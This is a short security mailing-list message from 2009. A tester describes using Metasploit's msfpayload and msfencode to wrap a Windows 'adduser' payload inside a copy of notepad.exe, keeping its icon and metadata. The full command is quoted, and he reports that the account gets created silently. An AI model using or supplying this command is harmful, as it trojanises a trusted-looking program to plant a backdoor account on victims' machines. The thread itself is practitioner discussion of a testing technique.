Ok, I just read Rob post here: http://www.room362.com/blog/2009/11/3/metasploit-blends-in-new-msfpayloadencode.html
and checked my exes. Since both are the same size, I'm guessing it's not working as a binder but as a "cloaker" of sorts. Adrian On Tue, Dec 1, 2009 at 5:12 PM, Adrian Crenshaw <[email protected]>wrote: > Ok, I did this: > > $ msfpayload windows/adduser user=test pass=test exitfunc=seh R | msfencode > -t exe -x notepad.exe -o MYNEWFILE.exe > > The exe made has the same icon an metadata as the original. The payload > runs since the "test" account is created, but notepad never comes up, so it > doen not make much of a binder. Any ideas? > > Adrian >
_______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
